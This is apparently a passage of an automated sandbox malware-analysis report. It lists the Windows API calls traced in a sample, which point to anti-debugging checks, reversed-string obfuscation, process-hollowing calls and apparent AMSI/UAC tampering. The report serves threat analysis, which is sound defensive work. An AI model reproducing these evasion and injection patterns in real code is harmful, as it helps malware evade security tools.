                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 13222 2b0f744-2b0f75e GetModuleHandleW 13223 2b0f760-2b0f772 GetProcAddress 13222->13223 13224 2b0f78a-2b0f792 13222->13224 13223->13224 13225 2b0f774-2b0f784 CheckRemoteDebuggerPresent 13223->13225 13225->13224 13226 2b0f786 13225->13226 13226->13224
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase), ref: 02B0F754
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B0F766
                                                                                                                                                                                                                                                                                                                                                                                                                          • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B0F77D
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 35162468-539270669
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d3122f54641c1e3c1db1f8ac22c364bd546a5142463ae8d5b97c17bc675a641f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d2f1dce2d3b170a87af933cb1c8c98b17c7ada64ab46ea2a55fd1853f34c8a81
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3122f54641c1e3c1db1f8ac22c364bd546a5142463ae8d5b97c17bc675a641f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91F0AE70644248BAEB22A6F488C87ECFF799B05324F1443D1A435615D1EF791641C652

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02AF4F2E
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B0DE40), ref: 02B0DDAB
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B0DE40), ref: 02B0DDDB
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B0DDF0
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B0DE1C
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B0DE25
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF4C60: SysFreeString.OLEAUT32(02B0F4A4), ref: 02AF4C6E
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1897104825-0

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B0E5F6
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603

APIs
  • Part of subcall function 02AF4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02AF4F2E
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B0DD5E), ref: 02B0DCCB
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B0DD05
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B0DD32
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B0DD3B
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
APIs
  • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
  • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
  • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
  • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
  • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
• CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B08814
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc$CreateProcessUser
• String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3130163322-2353454454
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B07A9F
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4072585319-445027087
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B07A9F
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4072585319-445027087
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
  • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
  • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
  • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
  • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
• NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B08471
Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc$MemoryReadVirtual
• String ID: ntdll$yromeMlautriVdaeRtN
• API String ID: 2521977463-737317276
APIs
  • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
  • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
  • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
  • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
  • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
• NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B07DEC
Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc$MemoryVirtualWrite
• String ID: Ntdll$yromeMlautriVetirW
• API String ID: 2719805696-3542721025
APIs
  • Part of subcall function 02B081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B0823C,?,?,00000000,?,02B07A7E,ntdll,00000000,00000000,02B07AC3,?,?,00000000), ref: 02B0820A
  • Part of subcall function 02B081CC: GetModuleHandleA.KERNELBASE(?), ref: 02B0821E
  • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
  • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
  • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
• NtUnmapViewOfSection.NTDLL(?,?), ref: 02B086D5
Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: HandleModule$AddressProc$SectionUnmapView
• String ID: noitceSfOweiVpamnUtN$ntdll
• API String ID: 3503870465-2520021413
APIs
• RtlI.N(?,?,00000000,02B0DC7E), ref: 02B0DC2C
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B0DC7E), ref: 02B0DC42
• NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B0DC7E), ref: 02B0DC61
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: Path$DeleteFileNameName_
• String ID:
• API String ID: 4284456518-0
APIs
  • Part of subcall function 02AF4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02AF4F2E
• RtlI.N(?,?,00000000,02B0DC7E), ref: 02B0DC2C
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B0DC7E), ref: 02B0DC42
• NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B0DC7E), ref: 02B0DC61
  • Part of subcall function 02AF4C60: SysFreeString.OLEAUT32(02B0F4A4), ref: 02AF4C6E
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: PathString$AllocDeleteFileFreeNameName_
• String ID:
• API String ID: 1530111750-0
APIs
  • Part of subcall function 02B06D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02B06DB9,?,?,?,00000000), ref: 02B06D99
• CoCreateInstance.OLE32(?,00000000,00000005,02B06EAC,00000000,00000000,02B06E2B,?,00000000,02B06E9B), ref: 02B06E17
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
Similarity
• API ID: CreateFromInstanceProg
• String ID:
• API String ID: 2151042543-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • InetIsOffline.URL(00000000,00000000,02B1B784,?,?,?,00000000,00000000), ref: 02B0F801
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B089D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02B7738C,Function_0000662C,00000004,02B7739C,02B7738C,05F5E103,00000040,02B773A0,741D0000,00000000,00000000), ref: 02B08AAA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02B0FAEB,UacInitialize,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,Initialize), ref: 02B0F6EE
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B0F700
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B0F754
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B0F766
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B0F77D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF7E5C: GetFileAttributesA.KERNEL32(00000000,?,02B1041F,ScanString,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,UacScan,02B77380,02B1B7B8,UacInitialize), ref: 02AF7E67
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C6B8B8,?,02B10751,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,OpenSession), ref: 02AFC37B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B0DE40), ref: 02B0DDAB
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B0DE40), ref: 02B0DDDB
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B0DDF0
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B0DE1C
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B0DE25
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF7E80: GetFileAttributesA.KERNEL32(00000000,?,02B1356F,ScanString,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,Initialize), ref: 02AF7E8B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B1370D,OpenSession,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,Initialize,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8), ref: 02AF8055
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
